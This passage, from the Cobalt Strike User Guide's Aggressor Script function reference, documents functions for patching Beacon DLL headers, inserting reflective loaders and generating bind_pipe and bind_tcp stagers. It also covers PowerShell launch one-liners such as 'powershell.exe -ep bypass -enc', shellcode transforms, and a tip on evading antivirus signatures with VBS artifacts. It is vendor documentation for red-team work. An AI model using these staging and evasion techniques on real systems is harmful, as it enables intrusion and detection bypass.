||
# warn("pe_set_string(dll, " . $offset . ", " . $value . ")");
|
||
CobaltStrikeUserGuide www.fortra.com page:410
|
||
|
||
AggressorScript/Functions
|
||
# $temp_dll = pe_set_string($temp_dll, $offset, $value);
|
||
# -------------------------------------
|
||
# Did it work?
|
||
# -------------------------------------
|
||
# dump_my_pe($temp_dll);
|
||
# -------------------------------------
|
||
# All Done! Give back edited DLL!
|
||
# -------------------------------------
|
||
return $temp_dll;
|
||
}
|
||
pe_set_value_at
|
||
SetsalongvaluebasedonthelocationresolvedbyanamefromthePEMap(seepedump).
|
||
Arguments
|
||
$1-BeaconDLLcontent
|
||
$2-Nameoflocationfield
|
||
$3-Value
|
||
Returns
|
||
UpdatedDLLContent
|
||
Example
|
||
# ===========================================================================
|
||
# $1 = DLL content
|
||
# ===========================================================================
|
||
sub demo_pe_set_value_at {
|
||
local('$temp_dll, $name, $long_value, $date');
|
||
local('%pemap');
|
||
local('@loc, @val');
|
||
$temp_dll = $1;
|
||
# -------------------------------------
|
||
# Inspect the current DLL...
|
||
CobaltStrikeUserGuide www.fortra.com page:411
|
||
|
||
AggressorScript/Functions
|
||
# -------------------------------------
|
||
# %pemap = pedump($temp_dll);
|
||
# @loc = values(%pemap, @("SizeOfImage."));
|
||
# @val = values(%pemap, @("SizeOfImage."));
|
||
# if (size(@val) != 1) {
|
||
# warn("Unexpected size of SizeOfImage. value array: " . size(@val));
|
||
# } else {
|
||
# warn("Current SizeOfImage. value: " . @val[0]);
|
||
# }
|
||
# if (size(@loc) != 1) {
|
||
# warn("Unexpected size of SizeOfImage location array: " . size(@loc));
|
||
# } else {
|
||
# warn("Current SizeOfImage. location: " . @loc[0]);
|
||
# }
|
||
# -------------------------------------
|
||
# Set parameters
|
||
# -------------------------------------
|
||
$name = "SizeOfImage";
|
||
$long_value = 22334455;
|
||
# -------------------------------------
|
||
# pe_set_value_at (set a long value at the location resolved by name)
|
||
# -------------------------------------
|
||
# $1 = DLL (byte array)
|
||
# $2 = name (string)
|
||
# $3 = value (long)
|
||
# -------------------------------------
|
||
warn("pe_set_value_at(dll, " . $name . ", " . $long_value . ")");
|
||
$temp_dll = pe_set_value_at($temp_dll, $name, $long_value);
|
||
# -------------------------------------
|
||
# Did it work?
|
||
# -------------------------------------
|
||
# dump_my_pe($temp_dll);
|
||
# -------------------------------------
|
||
# set it back?
|
||
# -------------------------------------
|
||
# warn("pe_set_value_at(dll, " . $name . ", " . @val[0] . ")");
|
||
# $temp_dll = pe_set_value_at($temp_dll, $name, @val[0]);
|
||
# dump_my_pe($temp_dll);
|
||
# -------------------------------------
|
||
# All Done! Give back edited DLL!
|
||
CobaltStrikeUserGuide www.fortra.com page:412
|
||
|
||
AggressorScript/Functions
|
||
# -------------------------------------
|
||
return $temp_dll;
|
||
}
|
||
pe_stomp
|
||
Setastringtonullcharacters.Startataspecifiedlocationandsetsallcharacterstonulluntila
|
||
nullstringterminatorisreached.
|
||
Arguments
|
||
$1-BeaconDLLcontent
|
||
$2-Startlocation
|
||
Returns
|
||
UpdatedDLLContent
|
||
Example
|
||
# ===========================================================================
|
||
# $1 = Beacon DLL content
|
||
# ===========================================================================
|
||
sub demo_pe_stomp {
|
||
local('$temp_dll, $offset, $value, $old_name');
|
||
local('%pemap');
|
||
local('@loc, @val');
|
||
$temp_dll = $1;
|
||
# -------------------------------------
|
||
# Inspect the current DLL...
|
||
# -------------------------------------
|
||
%pemap = pedump($temp_dll);
|
||
@loc = values(%pemap, @("Sections.AddressOfName.1."));
|
||
@val = values(%pemap, @("Sections.AddressOfName.1."));
|
||
if (size(@val) != 1) {
|
||
warn("Unexpected size of Sections.AddressOfName.1 value array: " . size(@val));
|
||
} else {
|
||
warn("Current Sections.AddressOfName.1 value: " . @val[0]);
|
||
}
|
||
CobaltStrikeUserGuide www.fortra.com page:413
|
||
|
||
AggressorScript/Functions
|
||
if (size(@loc) != 1) {
|
||
warn("Unexpected size of Sections.AddressOfName.1 location array: " . size
|
||
(@loc));
|
||
} else {
|
||
warn("Current Sections.AddressOfName.1 location: " . @loc[0]);
|
||
}
|
||
# -------------------------------------
|
||
# Set parameters (parse number as base 10)
|
||
# -------------------------------------
|
||
$location = parseNumber(@loc[0], 10);
|
||
# -------------------------------------
|
||
# pe_stomp (stomp a string at a location)
|
||
# -------------------------------------
|
||
# warn("pe_stomp(dll, " . $location . ")");
|
||
$temp_dll = pe_stomp($temp_dll, $location);
|
||
# -------------------------------------
|
||
# Did it work?
|
||
# -------------------------------------
|
||
# dump_my_pe($temp_dll);
|
||
# -------------------------------------
|
||
# All Done! Give back edited DLL!
|
||
# -------------------------------------
|
||
return $temp_dll;
|
||
}
|
||
pe_update_checksum
|
||
UpdatethechecksumintheBeaconDLLContent.
|
||
Arguments
|
||
$1-BeaconDLLcontent
|
||
Returns
|
||
UpdatedDLLContent
|
||
Note
|
||
Thisshouldbethelasttransformationperformed.
|
||
CobaltStrikeUserGuide www.fortra.com page:414
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
# -------------------------------------
|
||
# update checksum
|
||
# -------------------------------------
|
||
$temp_dll = pe_update_checksum($temp_dll);
|
||
pedump
|
||
ParseanexecutableBeaconintoamapofthePEHeaderinformation.Theparsedinformation
|
||
canbeusedforresearchorprogrammaticallytomakechangestotheBeacon.
|
||
Arguments
|
||
$1-BeaconDLLcontent
|
||
Returns
|
||
Amapoftheparsedinformation.Themapdataisverysimilartothe"./peclonedump[file]"
|
||
commandoutput.
|
||
Example
|
||
# ===========================================================================
|
||
# 'case insensitive sort' from sleep manual...
|
||
# ===========================================================================
|
||
sub caseInsensitiveCompare
|
||
{
|
||
$a = lc($1);
|
||
$b = lc($2);
|
||
return $a cmp $b;
|
||
}
|
||
# ===========================================================================
|
||
# Dump PE Information
|
||
# $1 = Beacon DLL content
|
||
# ===========================================================================
|
||
sub dump_my_pe {
|
||
local('$out $key $val %pemap @sorted_keys');
|
||
%pemap = pedump($1);
|
||
# ---------------------------------------------------
|
||
CobaltStrikeUserGuide www.fortra.com page:415
|
||
|
||
AggressorScript/Functions
|
||
# Example listing all items from hash/map...
|
||
# ---------------------------------------------------
|
||
@sorted_keys = sort(&caseInsensitiveCompare, keys(%pemap));
|
||
foreach $key (@sorted_keys)
|
||
{
|
||
$out = "$[50]key";
|
||
foreach $val (values(%pemap, @($key)))
|
||
{
|
||
$out .= " $val";
|
||
println($out);
|
||
}
|
||
}
|
||
# ---------------------------------------------------
|
||
# Example of grabbing specific items from hash/map...
|
||
# ---------------------------------------------------
|
||
local('@loc_cs @val_cs');
|
||
@loc_cs = values(%pemap, @("CheckSum.<location>"));
|
||
@val_cs = values(%pemap, @("CheckSum.<value>"));
|
||
println("");
|
||
println("My DLL CheckSum Location: " . @loc_cs);
|
||
println("My DLL CheckSum Value: " . @val_cs);
|
||
println("");
|
||
}
|
||
Seealso
|
||
./peclonedump[file]
|
||
pgraph
|
||
GeneratethepivotgraphGUIcomponent.
|
||
Returns
|
||
ThepivotgraphGUIobject(ajavax.swing.JComponent)
|
||
Example
|
||
addVisualization("Pivot Graph", pgraph());
|
||
Seealso
|
||
CobaltStrikeUserGuide www.fortra.com page:416
|
||
|
||
AggressorScript/Functions
|
||
&showVisualization
|
||
pivots
|
||
ReturnsalistofSOCKSpivotsfromCobaltStrike'sdatamodel.
|
||
Returns
|
||
Anarrayofdictionaryobjectswithinformationabouteachpivot.
|
||
Example
|
||
printAll(pivots());
|
||
popup_clear
|
||
Removeallpopupmenusassociatedwiththecurrentmenu.ThisisawaytooverrideCobalt
|
||
Strike'sdefaultpopupmenudefinitions.
|
||
Arguments
|
||
$1-thepopuphooktoclearregisteredmenusfor
|
||
Example
|
||
popup_clear("help");
|
||
popup help {
|
||
item "My stuff!" {
|
||
show_message("This is my menu!");
|
||
}
|
||
}
|
||
powershell
|
||
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_stager and
|
||
&powershell_command instead.
|
||
ReturnsaPowerShellone-linertobootstrapthespecifiedlistener.
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:417
|
||
|
||
AggressorScript/Functions
|
||
$1-thelistenername
|
||
$2-[true/false]:isthislistenertargetinglocalhost?
|
||
$3-x86|x64-thearchitectureofthegeneratedstager.
|
||
Notes
|
||
Beawarethatnotalllistenerconfigurationshavex64stagers.Ifindoubt,usex86.
|
||
Returns
|
||
APowerShellone-linertorunthespecifiedlistener.
|
||
Example
|
||
println(powershell("my listener", false));
|
||
powershell_command
|
||
Returnsaone-linertorunaPowerShellexpression(e.g.,powershell.exe -nop -w
|
||
hidden -encodedcommand MgAgACsAIAAyAA==)
|
||
Arguments
|
||
$1-thePowerShellexpressiontowrapintoaone-liner.
|
||
$2-willthePowerShellcommandrunonaremotetarget?
|
||
Returns
|
||
Returnsapowershell.exeone-linertorunthespecifiedexpression.
|
||
Example
|
||
$cmd = powershell_command("2 + 2", false);
|
||
println($cmd);
|
||
powershell_compress
|
||
CompressesaPowerShellscriptandwrapsitinascripttodecompressandexecuteit.
|
||
CobaltStrikeUserGuide www.fortra.com page:418
|
||
|
||
AggressorScript/Functions
|
||
Arguments
|
||
$1-thePowerShellscripttocompress.
|
||
Example
|
||
$script = powershell_compress("2 + 2");
|
||
powershell_encode_oneliner
|
||
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &powershell_command
|
||
instead.
|
||
Returnsaone-linertorunaPowerShellexpression(e.g.,powershell.exe -nop -w
|
||
hidden -encodedcommand MgAgACsAIAAyAA==)
|
||
Arguments
|
||
$1-thePowerShellexpressiontowrapintoaone-liner.
|
||
Returnsapowershell.exeone-linertorunthespecifiedexpression.
|
||
Example
|
||
$cmd = powershell_encode_oneliner("2 + 2");
|
||
println($cmd);
|
||
powershell_encode_stager
|
||
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_general and
|
||
&powershell_command instead.
|
||
Returnsabase64encodedPowerShellscripttorunthespecifiedshellcode
|
||
Arguments
|
||
$1-shellcodetowrap
|
||
Returns
|
||
Returnsabase64encodedPowerShellsuitableforusewithpowershell.exe's-encoption.
|
||
CobaltStrikeUserGuide www.fortra.com page:419
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
$shellcode = shellcode("my listener", false);
|
||
$readytouse = powershell_encode_stager($shellcode);
|
||
println("powershell.exe -ep bypass -enc $readytouse");
|
||
pref_get
|
||
GrabsastringvaluefromCobaltStrike'spreferences.
|
||
Arguments
|
||
$1-thepreferencename
|
||
$2-thedefaultvalue[ifthereisnovalueforthispreference]
|
||
Returns
|
||
Astringwiththepreferencevalue.
|
||
Example
|
||
$foo = pref_get("foo.string", "bar");
|
||
pref_get_list
|
||
GrabsalistvaluefromCobaltStrike'spreferences.
|
||
Arguments
|
||
$1-thepreferencename
|
||
Returns
|
||
Anarraywiththepreferencevalues
|
||
Example
|
||
@foo = pref_get_list("foo.list");
|
||
CobaltStrikeUserGuide www.fortra.com page:420
|
||
|
||
AggressorScript/Functions
|
||
pref_set
|
||
SetavalueinCobaltStrike'spreferences
|
||
Arguments
|
||
$1-thepreferencename
|
||
$2-thepreferencevalue
|
||
Example
|
||
pref_set("foo.string", "baz!");
|
||
pref_set_list
|
||
StoresalistvalueintoCobaltStrike'spreferences.
|
||
Arguments
|
||
$1-thepreferencename
|
||
$2-anarrayofvaluesforthispreference
|
||
Example
|
||
pref_set_list("foo.list", @("a", "b", "c"));
|
||
previousTab
|
||
Activatethetabthatistotheleftofthecurrenttab.
|
||
Example
|
||
bind Ctrl+Left {
|
||
previousTab();
|
||
}
|
||
process_browser
|
||
CobaltStrikeUserGuide www.fortra.com page:421
|
||
|
||
AggressorScript/Functions
|
||
OpenstheProcessBrowser.Thisfunctiondoesnothaveanyparameters.
|
||
privmsg
|
||
Postaprivatemessagetoauserintheeventlog
|
||
Arguments
|
||
$1-whotosendthemessageto
|
||
$2-themessage
|
||
Example
|
||
privmsg("raffi", "what's up man?");
|
||
prompt_confirm
|
||
ShowadialogwithYes/Nobuttons.Iftheuserpressesyes,callthespecifiedfunction.
|
||
Arguments
|
||
$1-textinthedialog
|
||
$2-titleofthedialog
|
||
$3-acallbackfunction.Calledwhentheuserpressesyes.
|
||
Example
|
||
prompt_confirm("Do you feel lucky?", "Do you?", {
|
||
show_mesage("Ok, I got nothing");
|
||
});
|
||
prompt_directory_open
|
||
Showadirectoryopendialog.
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:422
|
||
|
||
AggressorScript/Functions
|
||
$1-titleofthedialog
|
||
$2-defaultvalue
|
||
$3-true/false:allowusertoselectmultiplefolders?
|
||
$4-acallbackfunction.Calledwhentheuserchoosesafolder.Theargumenttothecallbackis
|
||
theselectedfolder.Ifmultiplefoldersareselected,theywillstillbespecifiedasthefirst
|
||
argument,separatedbycommas.
|
||
Example
|
||
prompt_directory_open("Choose a folder", $null, false, {
|
||
show_message("You chose: $1");
|
||
});
|
||
prompt_file_open
|
||
Showafileopendialog.
|
||
Arguments
|
||
$1-titleofthedialog
|
||
$2-defaultvalue
|
||
$3-true/false:allowusertoselectmultiplefiles?
|
||
$4-acallbackfunction.Calledwhentheuserchoosesafiletoopen.Theargumenttothe
|
||
callbackistheselectedfile.Ifmultiplefilesareselected,theywillstillbespecifiedasthefirst
|
||
argument,separatedbycommas.
|
||
Example
|
||
prompt_file_open("Choose a file", $null, false, {
|
||
show_message("You chose: $1");
|
||
});
|
||
prompt_file_save
|
||
Showafilesavedialog.
|
||
CobaltStrikeUserGuide www.fortra.com page:423
|
||
|
||
AggressorScript/Functions
|
||
Arguments
|
||
$1-defaultvalue
|
||
$2-acallbackfunction.Calledwhentheuserchoosesafilename.Theargumenttothecallback
|
||
isthedesiredfile.
|
||
Example
|
||
prompt_file_save($null, {
|
||
local('$handle');
|
||
$handle = openf("> $+ $1");
|
||
println($handle, "I am content");
|
||
closef($handle);
|
||
});
|
||
prompt_text
|
||
Showadialogthataskstheuserfortext.
|
||
Arguments
|
||
$1-textinthedialog
|
||
$2-defaultvalueinthetextfield.
|
||
$3-acallbackfunction.CalledwhentheuserpressesOK.Thefirstargumenttothiscallbackis
|
||
thetexttheuserprovided.
|
||
Example
|
||
prompt_text("What is your name?", "Cyber Bob", {
|
||
show_mesage("Hi $1 $+ , nice to meet you!");
|
||
});
|
||
range
|
||
Generateanarrayofnumbersbasedonastringdescriptionofranges.
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:424
|
||
|
||
AggressorScript/Functions
|
||
$1-astringwithadescriptionofranges
|
||
Range Result
|
||
103 Thenumber103
|
||
3-8 Thenumbers3,4,5,6,and7.
|
||
2,4-6 Thenumbers2,4,and5.
|
||
Returns
|
||
Anarrayofnumberswithinthespecifiedranges.
|
||
Example
|
||
printAll(range("2,4-6"));
|
||
redactobject
|
||
Removesapost-exploitationobject(e.g.,screenshot,keystrokebuffer)fromtheuserinterface.
|
||
Arguments
|
||
$1-theIDofthepost-exploitationobject.
|
||
removeTab
|
||
Closetheactivetab
|
||
Example
|
||
bind Ctrl+D {
|
||
removeTab();
|
||
}
|
||
resetData
|
||
ResetCobaltStrike'sdatamodel.
|
||
say
|
||
CobaltStrikeUserGuide www.fortra.com page:425
|
||
|
||
AggressorScript/Functions
|
||
Postapublicchatmessagetotheeventlog.
|
||
Arguments
|
||
$1-themessage
|
||
Example
|
||
say("Hello World!");
|
||
sbrowser
|
||
GeneratethesessionbrowserGUIcomponent.ShowsBeaconANDSSHsessions.
|
||
Returns
|
||
ThesessionbrowserGUIobject(ajavax.swing.JComponent)
|
||
Example
|
||
addVisualization("Session Browser", sbrowser());
|
||
Seealso
|
||
&showVisualization
|
||
screenshots
|
||
ReturnsalistofscreenshotsfromCobaltStrike'sdatamodel.
|
||
Returns
|
||
Anarrayofdictionaryobjectswithinformationabouteachscreenshot.
|
||
Example
|
||
printAll(screenshots());
|
||
script_resource
|
||
CobaltStrikeUserGuide www.fortra.com page:426
|
||
|
||
AggressorScript/Functions
|
||
Returnsthefullpathtoaresourcethatisstoredrelativetothisscriptfile.
|
||
Arguments
|
||
$1-thefiletogetapathfor
|
||
Returns
|
||
Thefullpathtothespecifiedfile.
|
||
Example
|
||
println(script_resource("dummy.txt"));
|
||
separator
|
||
Insertaseparatorintothecurrentmenutree.
|
||
Example
|
||
popup foo {
|
||
item "Stuff" { ... }
|
||
separator();
|
||
item "Other Stuff" { ... }
|
||
}
|
||
services
|
||
ReturnsalistofservicesinCobaltStrike'sdatamodel.
|
||
Returns
|
||
Anarrayofdictionaryobjectswithinformationabouteachservice.
|
||
Example
|
||
printAll(services());
|
||
setup_reflective_loader
|
||
CobaltStrikeUserGuide www.fortra.com page:427
|
||
|
||
AggressorScript/Functions
|
||
Insertthereflectiveloaderexecutablecodeintoabeaconpayload.
|
||
Arguments
|
||
$1-Originalbeaconexecutablepayload.
|
||
$2-UserdefinedReflectiveLoaderexecutabledata.
|
||
Returns
|
||
Thebeaconexecutablepayloadupdatedwiththeuserdefinedreflectiveloader.$nullifthereis
|
||
anerror.
|
||
Notes
|
||
TheuserdefinedReflectiveLoadermustbelessthan5k.
|
||
Example
|
||
SeeBEACON_RDLL_GENERATEhook
|
||
# ---------------------------------------------------------------------
|
||
# Replace the beacons default loader with '$loader'.
|
||
# ---------------------------------------------------------------------
|
||
$temp_dll = setup_reflective_loader($2, $loader);
|
||
setup_strings
|
||
ApplythestringsdefinedintheMalleableC2profiletothebeaconpayload.
|
||
Arguments
|
||
$1–beaconpayloadtomodify
|
||
Returns
|
||
Theupdatedbeaconpayloadwiththedefinedstringsappliedtothepayload.
|
||
Example
|
||
SeeBEACON_RDLL_GENERATEhook
|
||
CobaltStrikeUserGuide www.fortra.com page:428
|
||
|
||
AggressorScript/Functions
|
||
# Apply strings to the beacon payload.
|
||
$temp_dll = setup_strings($temp_dll);
|
||
setup_transformations
|
||
ApplythetransformationsrulesdefinedintheMalleableC2profiletothebeaconpayload.
|
||
Arguments
|
||
$1–Beaconpayloadtomodify
|
||
$2–Beaconarchitecture(x86/x64)
|
||
Returns
|
||
Theupdatedbeaconpayloadwiththetransformationsappliedtothepayload.
|
||
Example
|
||
SeeBEACON_RDLL_GENERATEhook
|
||
# Apply the transformations to the beacon payload.
|
||
$temp_dll = setup_transformations($temp_dll, $arch);
|
||
shellcode
|
||
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &stager instead.
|
||
ReturnsrawshellcodeforaspecificCobaltStrikelistener
|
||
Arguments
|
||
$1-thelistenername
|
||
$2-true/false:isthisshellcodedestinedforaremotetarget?
|
||
$3-x86|x64-thearchitectureofthestageroutput.
|
||
Note
|
||
Beawarethatnotalllistenerconfigurationshavex64stagers.Ifindoubt,usex86.
|
||
CobaltStrikeUserGuide www.fortra.com page:429
|
||
|
||
AggressorScript/Functions
|
||
Returns
|
||
Ascalarcontainingshellcodeforthespecifiedlistener.
|
||
Example
|
||
$data = shellcode("my listener", false, "x86");
|
||
$handle = openf(">out.bin");
|
||
writeb($handle, $data);
|
||
closef($handle);
|
||
showVisualization
|
||
SwitchCobaltStrikevisualizationtoaregisteredvisualization.
|
||
Arguments
|
||
$1-thenameofthevisualization
|
||
Example
|
||
bind Ctrl+H {
|
||
showVisualization("Hello World");
|
||
}
|
||
Seealso
|
||
&showVisualization
|
||
show_error
|
||
Showsanerrormessagetotheuserinadialogbox.Usethisfunctiontorelayerrorinformation.
|
||
Arguments
|
||
$1-themessagetext
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:430
|
||
|
||
AggressorScript/Functions
|
||
show_error("You did something bad.");
|
||
show_message
|
||
Showsamessagetotheuserinadialogbox.Usethisfunctiontorelayinformation.
|
||
Arguments
|
||
$1-themessagetext
|
||
Example
|
||
show_message("You've won a free ringtone");
|
||
site_host
|
||
HostcontentonCobaltStrike'swebserver
|
||
Arguments
|
||
$1-thehostforthissite(&localipisagooddefault)
|
||
$2-theport(e.g.,80)
|
||
$3-theURI(e.g.,/foo)
|
||
$4-thecontenttohost(asastring)
|
||
$5-themime-type(e.g.,"text/plain")
|
||
$6-adescriptionofthecontent.ShowninSite Management -> Manage.
|
||
$7-useSSLornot(trueorfalse)
|
||
Returns
|
||
TheURLtothishostedsite
|
||
Example
|
||
site_host(localip(), 80, "/", "Hello World!", "text/plain", "Hello World
|
||
Page", false);
|
||
CobaltStrikeUserGuide www.fortra.com page:431
|
||
|
||
AggressorScript/Functions
|
||
site_kill
|
||
RemoveasitefromCobaltStrike'swebserver
|
||
Arguments
|
||
$1-theport
|
||
$2-theURI
|
||
Example
|
||
# removes the content bound to / on port 80
|
||
site_kill(80, "/");
|
||
sites
|
||
ReturnsalistofsitestiedtoCobaltStrike'swebserver.
|
||
Returns
|
||
Anarrayofdictionaryobjectswithinformationabouteachregisteredsite.
|
||
Example
|
||
printAll(sites());
|
||
ssh_command_describe
|
||
DescribeanSSHcommand.
|
||
Returns
|
||
AstringdescriptionoftheSSHcommand.
|
||
Arguments
|
||
$1-thecommand
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:432
|
||
|
||
AggressorScript/Functions
|
||
println(ssh_command_describe("sudo"));
|
||
ssh_command_detail
|
||
GetthehelpinformationforanSSHcommand.
|
||
Returns
|
||
AstringwithhelpfulinformationaboutanSSHcommand.
|
||
Arguments
|
||
$1-thecommand
|
||
Example
|
||
println(ssh_command_detail("sudo"));
|
||
ssh_command_register
|
||
RegisterhelpinformationforanSSHconsolecommand.
|
||
Arguments
|
||
$1-thecommand
|
||
$2-theshortdescriptionofthecommand
|
||
$3-thelong-formhelpforthecommand.
|
||
Example
|
||
ssh_alias echo {
|
||
blog($1, "You typed: " . substr($1, 5));
|
||
}
|
||
ssh_command_register(
|
||
"echo",
|
||
"echo posts to the current session's log",
|
||
"Synopsis: echo [arguments]\n\nLog arguments to the SSH console");
|
||
CobaltStrikeUserGuide www.fortra.com page:433
|
||
|
||
AggressorScript/Functions
|
||
ssh_commands
|
||
GetalistofSSHcommands.
|
||
Returns
|
||
AnarrayofSSHcommands.
|
||
Example
|
||
printAll(ssh_commands());
|
||
stager
|
||
ReturnsthestagerforaspecificCobaltStrikelistener
|
||
Arguments
|
||
$1-thelistenername
|
||
$2-x86|x64-thearchitectureofthestageroutput.
|
||
Note
|
||
Beawarethatnotalllistenerconfigurationshavex64stagers.Ifindoubt,usex86.
|
||
Returns
|
||
Ascalarcontainingshellcodeforthespecifiedlistener.
|
||
Example
|
||
$data = stager("my listener", "x86");
|
||
$handle = openf(">out.bin");
|
||
writeb($handle, $data);
|
||
closef($handle);
|
||
stager_bind_pipe
|
||
CobaltStrikeUserGuide www.fortra.com page:434
|
||
|
||
AggressorScript/Functions
|
||
Returnsabind_pipestagerforaspecificCobaltStrikelistener.Thisstagerissuitableforusein
|
||
lateralmovementactionsthatbenefitfromasmallnamedpipestager.Stagewith&beacon_
|
||
stage_pipe.
|
||
Arguments
|
||
$1-thelistenername
|
||
Returns
|
||
Ascalarcontainingx86bind_pipeshellcode.
|
||
Example
|
||
# step 1. generate our stager
|
||
$stager = stager_bind_pipe("my listener");
|
||
# step 2. do something to run our stager
|
||
# step 3. stage a payload via this stager
|
||
beacon_stage_pipe($bid, $target, "my listener", "x86");
|
||
# step 4. assume control of the payload (if needed)
|
||
beacon_link($bid, $target, "my listener");
|
||
Seealso
|
||
&artifact_general
|
||
stager_bind_tcp
|
||
Returnsabind_tcpstagerforaspecificCobaltStrikelistener.Thisstagerissuitableforusein
|
||
localhost-onlyactionsthatrequireasmallstager.Stagewith&beacon_stage_tcp.
|
||
Arguments
|
||
$1-thelistenername
|
||
$2-x86|x64-thearchitectureofthestageroutput.
|
||
$3-theporttobindto
|
||
CobaltStrikeUserGuide www.fortra.com page:435
|
||
|
||
AggressorScript/Functions
|
||
Returns
|
||
Ascalarcontainingbind_tcpshellcode
|
||
Example
|
||
# step 1. generate our stager
|
||
$stager = stager_bind_tcp("my listener", "x86", 1234);
|
||
# step 2. do something to run our stager
|
||
# step 3. stage a payload via this stager
|
||
beacon_stage_tcp($bid, $target, 1234, "my listener", "x86");
|
||
# step 4. assume control of the payload (if needed)
|
||
beacon_link($bid, $target, "my listener");
|
||
Seealso
|
||
&artifact_general
|
||
str_chunk
|
||
Chunkastringintomultipleparts
|
||
Arguments
|
||
$1-thestringtochunk
|
||
$2-themaximumsizeofeachchunk
|
||
Returns
|
||
Theoriginalstringsplitintomultiplechunks
|
||
Example
|
||
# hint... :)
|
||
else if ($1 eq "template.x86.ps1") {
|
||
local('$enc');
|
||
$enc = str_chunk(base64_encode($2), 61);
|
||
CobaltStrikeUserGuide www.fortra.com page:436
|
||
|
||
AggressorScript/Functions
|
||
return strrep($data, '%%DATA%%', join("' + '", $enc));
|
||
}
|
||
str_decode
|
||
Convertastringofbytestotextwiththespecifiedencoding.
|
||
Arguments
|
||
$1-thestringtodecode
|
||
$2-theencodingtouse.
|
||
Returns
|
||
Thedecodedtext.
|
||
Example
|
||
# convert back to a string we can use (from UTF16-LE)
|
||
$text = str_decode($string, "UTF16-LE");
|
||
str_encode
|
||
Converttexttobytestringwiththespecifiedcharacterencoding.
|
||
Arguments
|
||
$1-thestringtoencode
|
||
$2-theencodingtouse
|
||
Returns
|
||
Theresultingstring.
|
||
Example
|
||
# convert to UTF16-LE
|
||
$encoded = str_encode("this is some text", "UTF16-LE");
|
||
CobaltStrikeUserGuide www.fortra.com page:437
|
||
|
||
AggressorScript/Functions
|
||
str_xor
|
||
WalkastringandXOR itwiththeprovidedkey.
|
||
Arguments
|
||
$1-thestringtomask
|
||
$2-thekeytouse(string)
|
||
Returns
|
||
Theoriginalstringmaskedwiththespecifiedkey.
|
||
Example
|
||
$mask = str_xor("This is a string", "key");
|
||
$plain = str_xor($mask, "key");
|
||
sync_download
|
||
Syncadownloadedfile(View->Downloads)toalocalpath.
|
||
Arguments
|
||
$1-theremotepathtothefiletosync.See&downloads
|
||
$2-wheretosavethefilelocally
|
||
$3-(optional)acallbackfunctiontoexecutewhendownloadissynced.Thefirstargumentto
|
||
thisfunctionisthelocalpathofthedownloadedfile.
|
||
Example
|
||
# sync all downloads
|
||
command ga {
|
||
local('$download $lpath $name $count');
|
||
foreach $count => $download (downloads()) {
|
||
($lpath, $name) = values($download, @("lpath", "name"));
|
||
sync_download($lpath, script_resource("file $+ .$count"), lambda({
|
||
println("Downloaded $1 [ $+ $name $+ ]");
|
||
CobaltStrikeUserGuide www.fortra.com page:438
|
||
|
||
AggressorScript/Functions
|
||
}, \$name));
|
||
}
|
||
}
|
||
targets
|
||
ReturnsalistofhostinformationinCobaltStrike'sdatamodel.
|
||
Returns
|
||
Anarrayofdictionaryobjectswithinformationabouteachhost.
|
||
Example
|
||
printAll(targets());
|
||
tbrowser
|
||
GeneratethetargetbrowserGUIcomponent.
|
||
Returns
|
||
ThetargetbrowserGUIobject(ajavax.swing.JComponent)
|
||
Example
|
||
addVisualization("Target Browser", tbrowser());
|
||
Seealso
|
||
&showVisualization
|
||
tokenToEmail
|
||
Covertaphishingtokentoanemailaddress.
|
||
Arguments
|
||
$1-thephishingtoken
|
||
CobaltStrikeUserGuide www.fortra.com page:439
|
||
|
||
AggressorScript/Functions
|
||
Returns
|
||
Theemailaddressor"unknown"ifthetokenisnotassociatedwithanemail.
|
||
Example
|
||
set PROFILER_HIT {
|
||
local('$out $app $ver $email');
|
||
$email = tokenToEmail($5);
|
||
$out = "\c9[+]\o $1 $+ / $+ $2 [ $+ $email $+ ] Applications";
|
||
foreach $app => $ver ($4) {
|
||
$out .= "\n\t $+ $[25]app $ver";
|
||
}
|
||
return "$out $+ \n\n";
|
||
}
|
||
transform
|
||
Transformshellcodeintoanotherformat.
|
||
Arguments
|
||
$1-theshellcodetotransform
|
||
$2-thetransformtoapply
|
||
Type Description
|
||
array commaseparatedbytevalues
|
||
hex Hex-encodethevalue
|
||
powershell-base64 PowerShell.exe-friendlybase64encoder
|
||
vba aVBAarray()withnewlinesaddedin
|
||
vbs aVBSexpressionthatresultsinastring
|
||
veil Veil-readystring(\x##\x##)
|
||
Returns
|
||
Theshellcodeafterthespecifiedtransformisapplied
|
||
Example
|
||
CobaltStrikeUserGuide www.fortra.com page:440
|
||
|
||
AggressorScript/Functions
|
||
println(transform("This is a test!", "veil"));
|
||
transform_vbs
|
||
TransformshellcodeintoaVBSexpressionthatresultsinastring
|
||
Arguments
|
||
$1-theshellcodetotransform
|
||
$2-themaximumlengthofaplaintextrun
|
||
Notes
|
||
l
|
||
Previously,CobaltStrikewouldembeditsstagersintoVBSfilesasseveralChr()calls
|
||
concatenatedintoastring.
|
||
l CobaltStrike3.9introducedfeaturesthatrequiredlargerstagers.Theselargerstagers
|
||
weretoobigtoembedintoaVBSfilewiththeabovemethod.
|
||
l
|
||
TogetpastthisVBSlimitation,CobaltStrikeoptedtouseChr()callsfornon-ASCII
|
||
dataandrunsofdouble-quotedstringsforprintablecharacters.
|
||
l Thischange,anengineeringnecessity,unintentionallydefeatedstaticanti-virus
|
||
signaturesforCobaltStrike'sdefaultVBSartifactsatthattime.
|
||
l Ifyou'relookingforaneasyevasionbenefitwithVBSartifacts,consideradjustingthe
|
||
plaintextrunlengthinyourResourceKit.
|
||
Returns
|
||
Theshellcodeafterthistransformisapplied
|
||
Example
|
||
println(transform_vbs("This is a test!", "3"));
|
||
tstamp
|
||
Formatatimeintoadate/timevalue.Thisvaluedoesnotincludeseconds.
|
||
Arguments
|
||
$1-thetime[millisecondssincetheUNIXepoch]
|
||
CobaltStrikeUserGuide www.fortra.com page:441
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
println("The time is now: " . tstamp(ticks()));
|
||
Seealso
|
||
&dstamp
|
||
unbind
|
||
